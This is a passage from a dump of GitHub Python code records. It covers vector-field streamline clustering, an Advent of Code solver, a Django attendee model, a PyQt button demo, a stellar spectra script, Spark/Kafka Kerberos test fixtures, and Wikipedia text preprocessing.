bins=(bins - 1), density=True)\n if tmp is None:\n tmp = curl_hist\n else:\n tmp = np.hstack((tmp, curl_hist))\n\n feature_df[key, :] = tmp\n\n # clustering\n feature_adata = AnnData(feature_df)\n pca(feature_adata, X_data=feature_df, pca_key=\"X_pca\")\n if clustering_method == \"louvain\":\n louvain(feature_adata, obsm_key=\"X_pca\")\n elif clustering_method == \"leiden\":\n leiden(feature_adata, obsm_key=\"X_pca\")\n elif method in [\"hdbscan\", \"kmeans\"]:\n key = \"field_hdbscan\"\n hdbscan(feature_adata, X_data=feature_df, result_key=key, **kwargs)\n elif method == \"kmeans\":\n from sklearn.cluster import KMeans\n\n key = \"field_kmeans\"\n kmeans = KMeans(random_state=0, **kwargs).fit(X)\n feature_adata.obs[key] = kmeans.labels_.astype(\"str\")\n\n # clusters need to be categorical variables\n feature_adata.obs[key] = adata.obs.obs[key].astype(\"category\")\n else:\n raise ValueError(\n \"only louvain, leiden, hdbscan and kmeans clustering supported but your requested \"\n f\"method is {method}\"\n )\n\n if assign_fixedpoints or reversed_fixedpoints:\n tmp = np.array(strm.lines.get_segments()).reshape((-1, 2))\n vector_field_class.data[\"X\"] = np.unique(tmp, axis=0)\n\n if assign_fixedpoints:\n (\n X,\n valid_fps_type_assignment,\n assignment_id,\n ) = vector_field_class.assign_fixed_points(cores=1)\n\n feature_adata.obs[\"fixed_point\"] = -1\n\n if reversed_fixedpoints:\n # reverse vector field to identify source:\n vector_field_class.func = lambda x: -vector_field_class.func(x)\n (\n X_rev,\n valid_fps_type_assignment_rev,\n assignment_id_rev,\n ) = vector_field_class.assign_fixed_points(cores=1)\n\n feature_adata.obs[\"rev_fixed_point\"] = -1\n\n data_X = vector_field_class.data[\"X\"]\n for key, values in line_list.items():\n indices = [np.where(np.logical_and(data_X[:, 0] == val[0], data_X[:, 1] == val[1]))[0][0] for val in values]\n\n # assign fixed point to the most frequent point\n if assign_fixedpoints:\n mode_val = mode(assignment_id[indices])[0][0]\n if not np.isnan(mode_val):\n feature_adata.obs.loc[str(key), \"fixed_point\"] = mode_val\n if reversed_fixedpoints:\n mode_val = mode(assignment_id_rev[indices])[0][0]\n if not np.isnan(mode_val):\n feature_adata.obs.loc[str(key), \"rev_fixed_point\"] = mode_val\n\n adata.uns[\"streamline_clusters_\" + basis] = {\n \"feature_df\": feature_df,\n \"segments\": line_list_ori,\n \"X_pca\": feature_adata.obsm[\"X_pca\"],\n \"clustering_method\": clustering_method,\n \"distances\": feature_adata.obsp[\"X_pca_distances\"],\n \"connectivities\": feature_adata.obsp[\"X_pca_connectivities\"],\n \"clusters\": feature_adata.obs[clustering_method].values,\n }\n\n if assign_fixedpoints:\n adata.uns[\"streamline_clusters_\" + basis][\"fixed_point\"] = feature_adata.obs[\"fixed_point\"]\n if reversed_fixedpoints:\n adata.uns[\"streamline_clusters_\" + basis][\"rev_fixed_point\"] = feature_adata.obs[\"rev_fixed_point\"]\n","repo_name":"aristoteleo/dynamo-release","sub_path":"dynamo/vectorfield/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":19618,"program_lang":"python","lang":"en","doc_type":"code","stars":377,"dataset":"github-code","pt":"7"} +{"seq_id":"37725228887","text":"from functools import reduce\n\nfile_array = []\n\nwith open('Day_3/input.txt', 'r') as file:\n for line in file:\n file_array.append(line)\n\n\n# puzzle 1\nslope_right = 3\nslope_down = 1\ndown_index = 0\nright_index = 0\ntrees_1 = 0\n\nwhile down_index != (len(file_array) - 1):\n down_index = down_index + slope_down\n right_index = (right_index + slope_right) % (len(file_array[down_index]) - 1)\n if file_array[down_index][right_index] == \"#\":\n trees_1 += 1\n print(down_index, right_index)\n\n# puzzle 2\nslope_right = [1, 3, 5, 7, 1]\nslope_down = [1, 1, 1, 1, 2]\nanswer_array = []\nanswer = 0\n\nfor index in range(len(slope_right)):\n trees = 0\n down_index = 0\n right_index = 0\n while down_index < (len(file_array) - 1):\n down_index = down_index + slope_down[index]\n right_index = (right_index + slope_right[index]) % (len(file_array[down_index]) - 1)\n if file_array[down_index][right_index] == \"#\":\n trees += 1\n answer_array.append(trees)\n\nanswer = reduce((lambda x, y: x * y), answer_array)\n\nprint(\"Puzzle 1 solution: \" + str(trees_1))\nprint(\"Puzzle 2 solution: \" + str(answer))","repo_name":"bray4168/AoC-2020","sub_path":"Day_3/Day_3.py","file_name":"Day_3.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74587699421","text":"from datetime import date, datetime, timedelta, timezone\nfrom partial_date import PartialDate, PartialDateField\nfrom uuid import uuid4\nimport opencc\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import GenericRelation\nimport pghistory\nimport django.utils.timezone\nimport model_utils.fields\nimport partial_date.fields\n# import private_storage.fields\nfrom private_storage.storage.files import PrivateFileSystemStorage\nfrom django.contrib.postgres.indexes import GinIndex\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom django.utils.functional import cached_property\nfrom model_utils.models import SoftDeletableModel, TimeStampedModel\nfrom private_storage.fields import PrivateFileField\nfrom unidecode import unidecode\n\nfrom . import GenderEnum, Note, Utility\n\n\nclass Attendee(Utility, TimeStampedModel, SoftDeletableModel):\n FAMILY_CATEGORY = 0\n NON_FAMILY_CATEGORY = 25\n PAUSED_CATEGORY = 27\n SCHEDULED_CATEGORY = 1\n HIDDEN_ROLE = 0\n # RELATIVES_KEYWORDS = ['parent', 'mother', 'guardian', 'father', 'caregiver']\n # to find attendee's parents/caregiver in cowokers view of all activities\n # AS_PARENT_KEYWORDS = ['notifier', 'caregiver']\n # BE_LISTED_KEYWORDS = ['care receiver'] # let the attendee's attendance showed in their parent/caregiver account\n pasts = GenericRelation(\"persons.Past\")\n places = GenericRelation(\"whereabouts.Place\")\n notes = GenericRelation(Note)\n # related_ones = models.ManyToManyField('self',through='Relationship',symmetrical=False,related_name='related_to')\n id = models.UUIDField(default=uuid4, primary_key=True, editable=False, serialize=False)\n division = models.ForeignKey(\n \"whereabouts.Division\",\n default=0,\n null=False,\n blank=False,\n on_delete=models.SET(0),\n )\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n default=None,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n # families = models.ManyToManyField('persons.Family', through='FamilyAttendee', related_name='families')\n folks = models.ManyToManyField(\n \"persons.Folk\", through=\"FolkAttendee\", related_name=\"folks\"\n )\n first_name = models.CharField(max_length=25, db_index=True, null=True, blank=True)\n last_name = models.CharField(max_length=25, db_index=True, null=True, blank=True)\n first_name2 = models.CharField(max_length=12, db_index=True, null=True, blank=True)\n last_name2 = models.CharField(max_length=8, db_index=True, null=True, blank=True)\n gender = models.CharField(\n max_length=11,\n blank=False,\n null=False,\n default=GenderEnum.UNSPECIFIED,\n choices=GenderEnum.choices(),\n )\n actual_birthday = models.DateField(blank=True, null=True)\n estimated_birthday = PartialDateField(blank=True, null=True, help_text='1998, 1998-12 or 1992-12-31, please enter 1800 if year not known')\n deathday = models.DateField(blank=True, null=True)\n photo = PrivateFileField(\n \"Photo\", blank=True, null=True, upload_to=\"attendee_portrait\"\n ) # https://github.com/edoburu/django-private-storage\n infos = models.JSONField(\n null=True,\n blank=True,\n default=Utility.attendee_infos,\n help_text='Example: {\"fixed\": {\"food_pref\": \"peanut allergy\", \"nick_name\": \"John\"}}.'\n 'Please keep {} here even no data',\n )\n\n @property\n def display_label(self):\n return (\n (self.first_name or \"\")\n + \" \"\n + (self.last_name or \"\")\n + \" \"\n + (self.last_name2 or \"\")\n + (self.first_name2 or \"\")\n ).strip()\n\n @property\n def division_label(self):\n return self.division.display_name if self.division else None\n\n # @property\n # def other_relations(self):\n # return self.folks.exclude(category=self.FAMILY_CATEGORY)\n\n @property\n def related_ones(self): # Todo: need filter on folkattendee finish_date?\n return self.__class__.objects.filter(folks__in=self.folks.all()).distinct()\n\n @property\n def families(self):\n return self.folks.filter(category=self.FAMILY_CATEGORY)\n\n # def related_ones(self, only_current=True, only_active=True, folk_category_limit_to=None):\n # \"\"\"\n # :param only_current: if false, it will include expired folkattendee by existing finish date\n # :param only_active: if false, it will include deleted folkattendees and folks\n # :param folk_category_limit_to: to filter for a single int category id of folk\n # :return: Attendee queryset\n # \"\"\"\n # folk_filter = {}\n #\n # if folk_category_limit_to:\n # folk_filter['category'] = folk_category_limit_to\n #\n # if only_active:\n # folk_filter['is_removed'] = False\n #\n # filters = Q(\n # folkattendee__folk__in=self.folks.filter(**folk_filter)\n # )\n #\n # if only_active: # cannot combine with above\n # filters = filters & Q(folkattendee__is_removed=False)\n #\n # if only_current:\n # expire_filter = (\n # Q(folkattendee__finish__isnull=True)\n # |\n # Q(folkattendee__finish__gte=datetime.now(timezone.utc))\n # )\n # filters = filters & expire_filter\n #\n # return self.__class__.objects.filter(filters).distinct()\n\n @property\n def all_related_members(self):\n return self.__class__.objects.filter(\n Q(folks__in=self.folks.filter(category=self.FAMILY_CATEGORY))\n | Q( # self.folks.all() will include relationships of others\n folks__in=self.folks.filter(\n folkattendee__role=self.HIDDEN_ROLE\n ).exclude(category=self.FAMILY_CATEGORY)\n ),\n ).distinct()\n\n @property\n def other_relation_members(self):\n return self.__class__.objects.filter(\n folks__in=self.folks.filter(folkattendee__role=self.HIDDEN_ROLE).exclude(\n category=self.FAMILY_CATEGORY\n )\n ).distinct() # HIDDEN_ROLE indicates the relationship of the attendee, not others\n\n @cached_property\n def family_members(self):\n return self.__class__.objects.filter(\n folks__in=self.folks.filter(category=self.FAMILY_CATEGORY)\n ).distinct()\n\n @cached_property\n def self_phone_numbers(self):\n return self.self_addresses_for_fields_of([\"phone1\", \"phone2\"])\n\n @cached_property\n def self_email_addresses(self):\n return self.self_addresses_for_fields_of([\"email1\", \"email2\"])\n\n def self_addresses_for_fields_of(self, fields):\n contacts = self.infos.get(\"contacts\", {})\n return \", \".join(\n [contacts.get(field) for field in fields if contacts.get(field)]\n )\n\n @cached_property\n def caregiver_email_addresses(self):\n return self.caregiver_addresses_for_fields_of([\"email1\", \"email2\"])\n\n @cached_property\n def caregiver_phone_numbers(self):\n return self.caregiver_addresses_for_fields_of([\"phone1\", \"phone2\"])\n\n def caregiver_addresses_for_fields_of(self, fields):\n return \", \".join(\n set(\n a.self_addresses_for_fields_of(fields)\n for a in self.get_relative_emergency_contacts()\n )\n )\n\n def get_relative_emergency_contacts(self):\n return self.__class__.objects.filter(\n pk__in=[\n k for (k, v) in self.infos.get(\"emergency_contacts\", {}).items() if v\n ]\n )\n # self.related_ones.filter(\n # to_attendee__relation__relative=True,\n # to_attendee__relation__emergency_contact=True,\n # to_attendee__finish__gte=datetime.now(timezone.utc),\n # )\n\n def under_same_org_with(self, other_attendee_id):\n if other_attendee_id:\n return Attendee.objects.filter(\n pk=other_attendee_id, division__organization=self.division.organization\n ).exists()\n return False\n\n def can_be_scheduled_by(self, other_attendee_id):\n if str(self.id) == other_attendee_id:\n return True\n return Attendee.objects.filter(\n pk=self.id, infos__schedulers__contains={other_attendee_id: True}\n ).exists()\n\n def can_schedule_attendee(self, other_attendee_id):\n if str(self.id) == other_attendee_id:\n return True\n return Attendee.objects.filter(\n pk=other_attendee_id, infos__schedulers__contains={str(self.id): True}\n ).exists()\n # self.__class__.objects.filter(\n # (Q(from_attendee__finish__isnull=True) | Q(from_attendee__finish__gt=Utility.now_with_timezone())),\n # from_attendee__to_attendee__id=self.id,\n # from_attendee__from_attendee__id=other_attendee_id,\n # from_attendee__scheduler=True,\n # from_attendee__is_removed=False,\n # ).exists()\n\n def scheduling_attendees(self, include_self=True):\n \"\"\"\n :return: all attendees that can be scheduled by the attendee. For example, if a kid specified its\n parent by \"scheduler\" is true in its infos__schedulers, when calling parent_attendee.scheduling_attendees(),\n the kid will be returned, means the parent can change/see schedule of the kid.\n \"\"\"\n filters = Q(infos__schedulers__contains={str(self.id): True})\n\n if include_self:\n filters.add(Q(id=self.id), Q.OR)\n\n return self.__class__.objects.filter(filters)\n # self.__class__.objects.filter(\n # Q(id=self.id)\n # |\n # Q(\n # (Q(from_attendee__finish__isnull=True) | Q(from_attendee__finish__gt=Utility.now_with_timezone())),\n # from_attendee__to_attendee__id=self.id,\n # from_attendee__scheduler=True,\n # from_attendee__is_removed=False,\n # )\n # ).distinct()\n\n @cached_property\n def parents_notifiers_names(self):\n \"\"\"\n :return: attendees' names of their parents/caregiviers\n \"\"\"\n return \", \".join(\n list(\n self.get_relative_emergency_contacts().values_list(\n \"infos__names__original\", flat=True\n )\n )\n )\n\n def age(self):\n birthday = self.actual_birthday or (self.estimated_birthday and hasattr(self.estimated_birthday, 'date') and self.estimated_birthday.date)\n try:\n if birthday:\n age = (date.today() - birthday) // timedelta(days=365.2425)\n return age if age < 200 else None # estimated_birthday use 1800 as yearless date\n else:\n return None\n except Exception as e:\n print(\n self.__str__() + \"'s birthday incorrect: \",\n birthday,\n \". Type: \",\n type(birthday),\n \" exception: \",\n e,\n )\n return None\n\n def __str__(self):\n return self.display_label\n\n def clean(self):\n if not (\n self.last_name or self.last_name2 or self.first_name or self.first_name2\n ):\n raise ValidationError(\"You must specify at least a name\")\n\n def get_absolute_url(self):\n return reverse(\"/persons/attendee_detail_view/\", kwargs={\"pk\": self.pk})\n\n class Meta:\n db_table = \"persons_attendees\"\n ordering = [\"last_name\", \"first_name\"]\n indexes = [\n GinIndex(\n fields=[\"infos\"],\n name=\"attendee_infos_gin\",\n ),\n # GinIndex(fields=['progressions'], name='attendee_progressions_gin', ),\n ]\n\n def name1(self):\n return f\"{self.first_name or ''} {self.last_name or ''}\".strip()\n\n def name2(self):\n return f\"{self.last_name2 or ''}{self.first_name2 or ''}\".strip()\n\n def save(self, *args, **kwargs):\n self.estimated_birthday = Utility.presence(self.estimated_birthday)\n name = self.name1()\n name2 = self.name2()\n both_names = f\"{name} {name2}\".strip()\n self.infos[\"names\"][\"original\"] = both_names\n self.infos[\"names\"][\"romanization\"] = unidecode(\n both_names\n ).strip() # remove accents & get phonetic\n if self.division.organization.infos.get(\"settings\", {}).get(\n \"opencc_convert\"\n ): # Let search work in either language\n s2t_converter = opencc.OpenCC(\"s2t.json\")\n t2s_converter = opencc.OpenCC(\"t2s.json\")\n self.infos[\"names\"][\"traditional\"] = s2t_converter.convert(both_names)\n self.infos[\"names\"][\"simplified\"] = t2s_converter.convert(both_names)\n super(Attendee, self).save(*args, **kwargs)\n\n def all_names(self):\n return [\n self.first_name,\n self.last_name,\n self.last_name2,\n self.first_name2,\n ] + list(self.infos[\"names\"].values())\n\n # class ReadonlyMeta:\n # readonly = [\"full_name\"] # generated column\n\n\n# class TestModel(models.Model):\n# ...\n# @pghistory.track(\n# pghistory.Snapshot('attendee.snapshot')\n# )\n\n\nclass AttendeesHistory(pghistory.get_event_model(\n Attendee,\n pghistory.Snapshot('attendee.snapshot'),\n pghistory.BeforeDelete('attendee.before_delete'),\n name='AttendeesHistory',\n related_name='history',\n)):\n pgh_id = models.BigAutoField(primary_key=True, serialize=False)\n pgh_created_at = models.DateTimeField(auto_now_add=True)\n created = model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')\n modified = model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')\n is_removed = models.BooleanField(default=False)\n pgh_obj = models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='history', to='persons.attendee')\n id = models.UUIDField(db_index=True, default=uuid4, editable=False, serialize=False)\n division = models.ForeignKey(db_constraint=False, default=0, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='+', to='whereabouts.division')\n gender = models.CharField(choices=GenderEnum.choices(), default=GenderEnum['UNSPECIFIED'], max_length=11)\n pgh_label = models.TextField(help_text='The event label.')\n user = models.ForeignKey(blank=True, db_constraint=False, default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='+', to=settings.AUTH_USER_MODEL)\n pgh_context = models.ForeignKey(db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='pghistory.context')\n infos = models.JSONField(blank=True, default=Utility.attendee_infos, help_text='Example: {\"fixed\": {\"food_pref\": \"peanut allergy\", \"nick_name\": \"John\"}}.Please keep {} here even no data', null=True)\n first_name = models.CharField(blank=True, max_length=25, null=True)\n last_name = models.CharField(blank=True, max_length=25, null=True)\n first_name2 = models.CharField(blank=True, max_length=12, null=True)\n last_name2 = models.CharField(blank=True, max_length=8, null=True)\n photo = PrivateFileField(blank=True, null=True, storage=PrivateFileSystemStorage(), upload_to='attendee_portrait', verbose_name='Photo')\n actual_birthday = models.DateField(blank=True, null=True)\n estimated_birthday = partial_date.fields.PartialDateField(blank=True, help_text='1998, 1998-12 or 1992-12-31, please enter 1800 if year not known', null=True)\n deathday = models.DateField(blank=True, null=True)\n\n class Meta:\n db_table = \"persons_attendeeshistory\"\n","repo_name":"xjlin0/attendees32","sub_path":"attendees/persons/models/attendee.py","file_name":"attendee.py","file_ext":"py","file_size_in_byte":15959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"40858984795","text":"import sys\nfrom PyQt5.QtWidgets import QApplication ,QWidget,QPushButton\n\n# Simple Custom widget with a Button\nclass MyWidget(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 300, 300)\n self.setWindowTitle(\"My Widget\")\n\n # Setting the basic size and parameters of the button\n button = QPushButton(\"Start\",self)\n button.resize(100,30)\n button.move((self.width()/2 - button.width()/2)\n ,self.height()/2 - button.height()/2)\n\n #Button onClicked 'Signal' connected to our 'Slot'\n button.clicked.connect(self.clickMethod)\n\n #Set default size of the Widget\n self.show()\n\n def clickMethod(self):\n print(\"Start Button is clicked\")\n\nif __name__ == \"__main__\":\n\n app = QApplication(sys.argv)\n\n widget = MyWidget()\n sys.exit(app.exec())","repo_name":"njanirudh/PythonQt","sub_path":"SimpleSnippets/button_basic_1.py","file_name":"button_basic_1.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40398680156","text":"# calculates spectra of a given star at different inclinations\nfrom pa.lib import limbdark\nfrom pa.lib import fit as ft\nfrom pa.lib import star\nfrom pa.lib import util as ut\nimport numpy as np\nfrom numpy.core import defchararray as ch\nimport sys\nimport time\nimport argparse\nimport pickle\nimport os\n\ndef run():\n\tparser = argparse.ArgumentParser(description=\"Examples: \\n\" +\\\n\t\t\"calc_spectra data/vega.pkl data/vega/ -i 0.000 1.5707963267948966 150; \" +\\\n\t\t\"calc_spectra data/vega.pkl data/vega/ -i 0.088418; \" +\\\n\t\t\"calc_spectra data/altair.pkl data/altair/ -i 0.8840; \" +\\\n\t\t\"calc_spectra data/achernar.pkl data/achernar/ -i 1.0577\")\n\tparser.add_argument(\"pkl_sfile\", help=\"the pickled star file\")\n\tparser.add_argument(\"output\", help=\"the output directory\")\n\tparser.add_argument('-i', type=float, nargs='+', help='either a single inclination in radians ' +\n\t\t'or a equally spaced values specified by minimum, maximum and number', required=True)\n\tparser.add_argument(\"-m\", help=\"longitudinal integration method: 0=cubic(default), 1=trapezoidal\", type=int, \\\n\t\t\tdefault=0)\n\targs = parser.parse_args()\n\n\t## inputs\n\tpkl_sfile = args.pkl_sfile # pickled star file\n\toutput = args.output # output location\n\t\n\t# integration method\n\tif args.m == 0: \n\t\tm = 'cubic'\n\telif args.m == 1:\n\t\tm = 'trapezoid'\n\telse:\n\t\tsys.exit(\"Longitudinal integration method should be either 0 (cubic) or 1 (trapezoidal).\")\n\n\t# inclinations\n\ti = args.i \n\tli = len(i)\n\tif li not in [1, 3]:\n\t\tsys.exit(\"Please specify either a single inclination in radians (one number) \" +\\\n\t\t\t\"or a range specified by minimum, maximum and step (three numbers).\")\n\telif li == 1:\n\t\tinclinations = np.array( i )\n\t\t# decimal precision of inclination for printout\n\t\tprec = 6\n\telif li == 3:\n\t\tmi, ma, num = i\n\t\tinclinations = np.linspace( mi, ma, num=int(num) )\n\t\t# decimal precision of inclination for printout\n\t\tprec = np.int( np.ceil( -np.log10( (ma - mi) / num ) ) )\n\tleni = len(inclinations)\n\t\n\t# unpickle the star\n\twith open(pkl_sfile, 'rb') as f:\n\t\tst = pickle.load(f)\n\t# get the wavelengths at which we see light from this star\n\twl = st.wavelengths\n\n\t## write the spectra of the star in text format\n\t# create the directory if it doesn't exist\n\tif not os.path.exists(output):\n\t\tos.mkdir(output)\n\t# filenames\n\tif not output.endswith('/'):\n\t\toutput += '/'\n\tfilename = os.path.splitext(os.path.basename(pkl_sfile))[0]\n\tinc_str = np.array([(\"%.\" + str(prec) + \"f\") % x for x in np.round(inclinations, decimals=prec)])\n\tofiles = ch.add(output + filename + '_', ch.replace(inc_str, '.', '_'))\n\tofiles = ch.add(ofiles, '.txt')\n\n\tfor i, ofile in np.ndenumerate(ofiles):\n\t\t# message\n\t\tif i[0] % 10 == 0:\t\t\n\t\t\tprint(str(i[0]) + \" out of \" + str(leni) + \" inclinations calculated.\") \n\t\t\tsys.stdout.flush()\n\t\t# current inclination\n\t\tinc = inclinations[i] \n\t\t# calculate the spectrum or the magnitudes\n\t\tlight = st.integrate(inc, method=m)\n\n\t\t# create this file if it doesn't exist, open it for writing\n\t\tf = open(ofile,'w+') \n\t\t# write the header\n\t\tf.write('# luminosity: ' + str(st.luminosity) + '\\n')\n\t\tf.write('# omega: ' + str(st.surface.omega) + '\\n')\n\t\tf.write('# inclination(rad): ' + str(inclinations[i]) + '\\n')\n\t\tf.write('# mass: ' + str(st.mass) + '\\n')\n\t\tf.write('# Req: ' + str(st.Req) + '\\n')\n\t\tf.write('# distance: ' + format(st.distance, '.2e') + ' cm\\n')\n\t\tf.write('# A_V: ' + format(*(st.a_v), '.2f') + '\\n')\n\t\tf.write('# number of upper half z values: ' + str(st.map.nz) + '\\n')\n\t\t# write the spectrum to the file\n\t\tf.write('\\n')\n\t\tif st.bands is None: # spectrum mode\n\t\t\tf.write('# wavelength(nm)\\tflux(ergs/s/Hz/ster)\\n') \n\t\t\tfor j, w in np.ndenumerate(wl):\n\t\t\t\tf.write( str(w) )\n\t\t\t\tf.write('\\t %.5E' % light[j])\n\t\t\t\tf.write('\\n')\n\t\telse: # photometry mode\n\t\t\tf.write('# filter\\twavelength(nm)\\tmagnitude\\n') \n\t\t\tfor j, w in enumerate(wl):\n\t\t\t\tf.write( st.bands[j] )\n\t\t\t\tf.write('\\t %.6g' % w )\n\t\t\t\tf.write('\\t %.8f' % light[j])\n\t\t\t\tf.write('\\n')\n\t\tf.close()\n\t\t\n# in case we are running this file as the main program\nif __name__ == \"__main__\":\n\trun()","repo_name":"mlipatov/paint_atmospheres","sub_path":"pa/calc_spectra.py","file_name":"calc_spectra.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"5117541219","text":"import base64\nimport logging\nimport os\n\nimport pytest\nimport sdk_install\nimport sdk_security\nimport sdk_utils\nimport spark_s3 as s3\n\nLOGGER = logging.getLogger(__name__)\n\nPRODUCER_SERVICE_NAME = \"Spark->Kafka Producer\"\n\nDEFAULT_KAFKA_TASK_COUNT = 3\nKERBERIZED_KAFKA = True\nKAFKA_KRB5_ORIG = b'''[libdefaults]\ndefault_realm = LOCAL\n\n[realms]\n LOCAL = {\n kdc = kdc.marathon.autoip.dcos.thisdcos.directory:2500\n }\n'''\nKAFKA_KRB5 = base64.b64encode(KAFKA_KRB5_ORIG).decode('utf8')\nKAFKA_PACKAGE_NAME = os.getenv(\"KAFKA_PACKAGE_NAME\", \"kafka\")\nKAFKA_SERVICE_NAME = os.getenv(\"KAFKA_SERVICE_NAME\", (\"secure-kafka\" if KERBERIZED_KAFKA else \"kafka\"))\nKAFKA_SERVICE_ACCOUNT = \"{}-service-acct\".format(KAFKA_SERVICE_NAME)\nKAFKA_SERVICE_ACCOUNT_SECRET = \"{}-secret\".format(KAFKA_SERVICE_NAME)\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\nKEYTAB_SECRET = \"__dcos_base64___keytab\"\n\n\ndef upload_jaas():\n jaas_path = os.path.join(THIS_DIR, \"..\", \"resources\", \"spark-kafka-client-jaas.conf\")\n s3.upload_file(jaas_path)\n return s3.http_url(\"spark-kafka-client-jaas.conf\")\n\n\ndef get_kerberized_kafka_spark_conf(spark_service_name, keytab_secret=KEYTAB_SECRET):\n return [\n \"--conf\", \"spark.mesos.driver.secret.names={}\".format(keytab_secret),\n \"--conf\", \"spark.mesos.driver.secret.filenames=kafka-client.keytab\",\n \"--conf\", \"spark.mesos.executor.secret.names={}\".format(keytab_secret),\n \"--conf\", \"spark.mesos.executor.secret.filenames=kafka-client.keytab\",\n \"--conf\", \"spark.mesos.task.labels=DCOS_SPACE:/{}\".format(spark_service_name),\n \"--conf\", \"spark.executorEnv.KRB5_CONFIG_BASE64={}\".format(KAFKA_KRB5),\n \"--conf\", \"spark.mesos.driverEnv.KRB5_CONFIG_BASE64={}\".format(KAFKA_KRB5),\n \"--conf\", \"spark.driver.extraJavaOptions=-Djava.security.auth.login.config=\"\n \"/mnt/mesos/sandbox/spark-kafka-client-jaas.conf\",\n \"--conf\", \"spark.executor.extraJavaOptions=\"\n \"-Djava.security.auth.login.config=/mnt/mesos/sandbox/spark-kafka-client-jaas.conf\",\n ]\n\n\n@pytest.fixture(scope='package')\ndef configure_security_kafka():\n yield from sdk_security.security_session(framework_name=KAFKA_SERVICE_NAME,\n service_account=KAFKA_SERVICE_ACCOUNT,\n secret=KAFKA_SERVICE_ACCOUNT_SECRET)\n\n\n@pytest.fixture(scope='package')\ndef kerberized_kafka(configure_security_kafka, kerberos_options):\n try:\n additional_options = {\n \"service\": {\n \"name\": KAFKA_SERVICE_NAME,\n \"security\": kerberos_options\n },\n \"kafka\": {\n \"default_replication_factor\": 3,\n \"num_partitions\": 32\n }\n }\n\n if sdk_utils.is_strict_mode():\n additional_options[\"service\"][\"service_account\"] = KAFKA_SERVICE_ACCOUNT\n additional_options[\"service\"][\"principal\"] = KAFKA_SERVICE_ACCOUNT\n additional_options[\"service\"][\"service_account_secret\"] = KAFKA_SERVICE_ACCOUNT_SECRET\n additional_options[\"service\"][\"secret_name\"] = KAFKA_SERVICE_ACCOUNT_SECRET\n\n sdk_install.uninstall(KAFKA_PACKAGE_NAME, KAFKA_SERVICE_NAME)\n sdk_install.install(\n KAFKA_PACKAGE_NAME,\n KAFKA_SERVICE_NAME,\n DEFAULT_KAFKA_TASK_COUNT,\n additional_options=additional_options,\n timeout_seconds=30 * 60)\n\n yield\n\n finally:\n sdk_install.uninstall(KAFKA_PACKAGE_NAME, KAFKA_SERVICE_NAME)\n","repo_name":"mesosphere/spark-build","sub_path":"tests/integration/fixture_kafka.py","file_name":"fixture_kafka.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"7"} +{"seq_id":"4793113855","text":"import os\nfrom hanziconv import HanziConv\nimport re\n\n\ndef get_path(root_path):\n ALL = []\n for root, dirs, files in os.walk(root_path):\n # print(root) # 当前目录路径\n # print(dirs) # 当前路径下所有子目录\n # print(files) # 当前路径下所有非目录子文件\n for file in files:\n ALL.append(os.path.join(root, file))\n return ALL\n\n\ndef qu_kong(list):\n return [l for l in list if l != []]\n\n\ndef get_text_from_html(html_path):\n with open(html_path, 'r', encoding='utf-8') as f:\n t = f.read()\n t = t.split('') # 将文档中的每篇文章先分开来\n\n for ele in t:\n k = re.findall('title=\"(.*)\"', ele) # 读取每篇文章title\n try:\n if k != []:\n f = ele.split('title=\"%s\">\\n' % (k[0])) # 根据title切分每篇文章内容,\n want = f[1].strip() # 获得每篇文章的正文\n want = re.sub('\\n+', ' ', want) # 将每篇正文中的换行符转化成空格,让每一行代表一篇文章\n want = ' '.join(re.findall('[\\w|\\d]+', want)) # 去标点及特殊字符\n # print(want)\n want = HanziConv.toSimplified(want) # 繁转简\n with open('text', 'a', encoding='utf-8') as o:\n o.write(want)\n o.write('\\n')\n except Exception as e:\n print(html_path)\n print(ele)\n print(k)\n continue\n\n\nif __name__ == '__main__':\n root_path = 'G:\\AI_FOR_NLP\\wikiextractor\\wiki'\n all_path = qu_kong(get_path(root_path))\n for path in all_path:\n get_text_from_html(path)\n\n with open('text', 'r', encoding='utf-8') as f:\n texts = [line.strip() for line in f]\n\n twentyth_of_size = len(texts) // 20\n twentyth_text = texts[:twentyth_of_size] #取5%的文章\n with open('twentyth_text', 'a', encoding='utf-8') as o:\n # 5%文章合成一个字符串的形式保存\n for line in twentyth_text:\n line = line.strip()\n o.write(line + ' ')\n","repo_name":"hc1121/AI-For-NLP-Course","sub_path":"lesson_02/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1567817215","text":"import tensorrt\nimport os\nimport torch\nimport json\nfrom typing import Union\nimport numpy as np\nfrom SpecialTopic.Deploy.RemainEatingTimeRegression.RemainEatingTimeRegression import RemainEatingTimeRegressionNet, \\\n load_pretrained, get_mock_data, simplify_onnx, parser_setting\nfrom SpecialTopic.Deploy.OnnxToTensorRT.TensorrtBase import TensorrtBase\n\n\ndef create_onnx_file(model_phi='stander', setting='./prepare/setting_0.json', pretrained='./prepare/regression_0.pth',\n with_simplify=True, input_name='food_remain', output_name='time_remain',\n onnx_file_name='RemainEatingTimeRegression.onnx',\n 